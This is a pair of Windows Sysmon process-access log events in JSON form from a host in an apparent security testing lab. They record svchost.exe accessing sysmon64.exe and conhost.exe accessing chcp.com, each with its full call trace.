{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9290,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.701\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.701","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9291,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.701\r\nSourceProcessGUID: {E2A3D6B1-13D2-5F25-0000-0010631B1200}\r\nSourceProcessId: 3796\r\nSourceThreadId: 4948\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-13D2-5F25-0000-00105C361200}\r\nTargetProcessId: 4708\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.701","SourceProcessGUID":"{E2A3D6B1-13D2-5F25-0000-0010631B1200}","SourceProcessId":"3796","SourceThreadId":"4948","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-13D2-5F25-0000-00105C361200}","TargetProcessId":"4708","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
